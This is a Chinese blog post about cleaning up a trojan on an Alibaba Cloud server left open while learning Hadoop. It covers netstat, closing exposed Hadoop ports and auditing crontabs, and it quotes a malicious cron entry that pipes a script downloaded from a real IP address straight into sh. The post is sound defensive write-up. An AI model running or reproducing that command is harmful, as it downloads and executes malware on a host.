2. 程式人生 > >學習hadoop遇到的問題(記一次阿里雲伺服器被惡意掛木馬,CPU100%)

學習hadoop遇到的問題(記一次阿里雲伺服器被惡意掛木馬,CPU100%)

阿新 發佈:2019-01-08

在我剛開始學習時,把防火牆,安全組都開放了,過了一段時間被掛上了木馬。並且殺死程序一會還啟動

解決辦法

1通過命令netstat -antlp|grep 9002檢視埠檔案地址,刪除可以檔案(java資料夾)

2.還得在安全組中關閉hadoop一些對外開放的web頁面(可以改變埠號)

3.在/etc/crontab、/var/spool/cron/、/var/spool/cron/crontabs/下檢視可以檔案,檢視檔案裡的命令,

例如:

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

 
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1

這些就是可疑的命令,把他刪除

相關推薦

學習hadoop遇到的問題阿里伺服器惡意木馬CPU100%

在我剛開始學習時,把防火牆,安全組都開放了,過了一段時間被掛上了木馬。並且殺死程序一會還啟動 解決辦法 1通過命令netstat -antlp|grep 9002檢視埠檔案地址,刪除可以檔案(java資料夾) 2.還得在安全組中關閉hadoop一些對外開放的web頁面(可以改變埠號)

阿里伺服器執行慢排除

公司測試環境用的阿里雲伺服器+docker部署的,一共跑了14個專案。之前幾個月一直OK,最近幾天突然很卡很慢。剛開始以為是專案問題,又是擴大記憶體,又是清減外掛,甚至停了一半專案。結果CPU是下來了,但是構建、啟動、訪問還是很慢,各種百度、google、群裡問都沒能找到原因,最後提了個工單說明情況。 回覆說

阿里伺服器遷移

今天凌晨兩點 伺服器定時遷移了遷移之前 先把開機自啟動修改了一下 發現memcached沒有開機自啟動新增方式vim /etc/rc.d/rc.local增加一行/data/website/xunsearch/bin/xs-ctl.sh restart /usr/local/

阿里LVM擴容與 LVM 相關知識學習

一、lvm 擴容 問題: 我們阿里雲伺服器有一個磁碟容量為 1T ,但是最近由於業務的擴增,磁碟容量已經不夠了,需要增大磁碟的容量。磁碟掛載在 /home,使用的是 LVM。我們現在需要對磁碟進行擴容。 通過增加新的磁碟,然後將磁碟新增到卷組(VG),然後再將邏輯卷(LV)擴容。 擴容原有的磁碟。然後再

阿里盤擴容遇到的坑

背景 生產環境使用了阿里雲並且以mongo作為圖片伺服器,由於業務發展需要資料盤的400G的容量已經用到81%,所以需要對磁碟做無損擴容操作。 操作步驟 在控制檯上擴容資料盤的磁碟空間 官方文件:https://help.aliyun.com/document_detail/25452.html?s

阿里日誌服務配置

1、個人站點,沒有特殊要求,不要開通執行日誌,否則日誌儀表盤中看到一大波不相干的日誌,而且還費流量 2、分析apache日誌時,我一開始是直接跟著阿里雲文件:https://help.aliyun.com/document_detail/87740.html上面用customized的LogFormat

阿里SSL配置

https://blog.csdn.net/qq371959453/article/details/80508789 SSL申請上文中有 我這邊沒有用到nginx所以也就不用這些東西  直接在阿里雲上面配置,也是自己摸索的 反正http 已經變成了https了 有用到的可以參考

阿里RDS與自建資料庫同步中斷的補救過程

背景 2018年4月24日上午9點左右,小編在即將託管的伺服器上建立資料庫,並通過openvpn建立加密隧道,從而實現阿里雲RDS和本地自建資料庫之間同步。在託管伺服器上配置openvpn後,重啟openvpn客戶端時,一直獲取不到ip,後面重啟了一下openvpn服務端,本地託管伺服器獲取到了IP,之後小

阿里黑客攻擊事件

這幾天伺服器一直髮生異常行為,阿里雲報警如下:根據執行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,後臺某個程序一直從這個美國的IP地址下載sh可執行檔案訪問這個地址:http://165

阿里伺服器遷移路程

關於遷移: 1、伺服器遷移操作指引: (1)使用例項建立自定義映象https://help.aliyun.com/document_detail/35109.html (2)共享映象https://help.aliyun.com/document_detail/25463.html (3)建立例

jQuery選擇器——慘痛的經歷

1.基本選擇器 $("#id") //ID選擇器 $("div") //元素選擇器 $(".classname") //類選擇器 $(".classname,.classname1,#id1") //組合選擇器

CentOS 7靜默安裝Oracle 11g最小化CentOS 7安裝Oracle 11g的經歷

1.最小化安裝CentOS 7後首先設定一下固定IP可以先查詢一下自己的網絡卡裝置的名稱,是ens33,所以網絡卡配置檔名稱就是ifcfg-ens33(前面的ifcfg-不用管,固定的)ip addr開啟網絡卡配置檔案:vi /etc/sysconfig/network-sc

阿里電話面試

晚上九點跟朋友在看電影,正看到一半的時候接到來自杭州阿里巴巴的固定電話,心裡一驚,呀,好突然的電話面試啊,然後在毫無準備的情況下開始了這次的面試。接通電話一個聽上去很和藹的聲音開始自我介紹然後問我是否方便進行面試,在聽說我正在看電影之後說再約一個時間進行面試,我想了一下,本想

阿里面試總結

一面,電話面: 大概早上9點左右,收到了阿里HR的小姐姐的電話,聲音很好聽,雖然後面不怎麼管我了...跟她約了晚上9點的電話面..然後一整天上班不在狀態,開始各種回顧之前準備的知識.為了這次面試大概準備了半個月,利用每天下班到家8點到凌晨1點30的時間,瘋狂的補充自己的技術

漫漫優化路總會錯幾步接口優化

分鐘 線程 優化 並發 pipelined 分享 機器 info 有用 最近做了一個搜索接口的優化,反復壓測了四次,終於達到要求了,記錄一下,晚上加個雞腿?? 業務邏輯 從OpenSearch中檢索出數據,然後各種填充組裝數據,最後返回 邏輯看似很簡單,當初我也是這樣

阿里巴巴一面經歷作為名java程式設計師終於找到了自己差距!

面試前的故事 上週在拉勾上收到一個螞蟻金服的大哥要我的簡歷,當時很驚訝,居然有螞蟻金服的找到我,然後想都沒想就給了。 受

【年前最後波裝逼】阿里面試我是如何用一行程式碼解決約瑟夫環問題的

約瑟夫環問題算是很經典的題了,估計大家都聽說過,然後我就在一次筆試中遇到了,下面我就用 3 種方法來詳細講解一下這道題,最後一種方法學了之後保證讓你可以讓你裝逼。 問題描述:編號為 1-N 的 N 個士兵圍坐在一起形成一個圓圈,從編號為 1 的士兵開始依次報數(1,2,3...這樣依次報),數到 m 的 士

openstack 主機熱遷移失敗與恢復過程

openstack 遷移失敗 背景:最近把openstack上的所有機器的磁盤逐一重新分區,之前是兩塊磁盤用RAID1,但是ceph已經配置了3份副本,這樣相當於存6份副本了,目前磁盤資源不太夠。機器用的是HP P440ar的陣列卡,支持建立不同模式的邏輯卷,所以把磁盤分區修改為RAID1系統盤+RA

真實的網站黑經歷

明顯 AR 也說 用戶 -o HP 靜態 lis 圖片 前言 距離上次被DDOS×××已經有10天左右的時間,距離上上次已經記不起具體那一天了,每一次都這麽不了了只。然而近期一次相對持久的×××,我覺得有必要靜下心來,分享一下被黑的那段經歷。 在敘述經歷之前,先簡單的介紹

阿里上的kakfa叢集升級歷險記

       由於要在生產環境上debezium,筆者看到生產環境上的kafka版本是1.0.0,而現在kafka最新版本都是2.0了,於是想升級一下kafka。按照kafka的官網上的例子來升級。發現升級完kafka叢集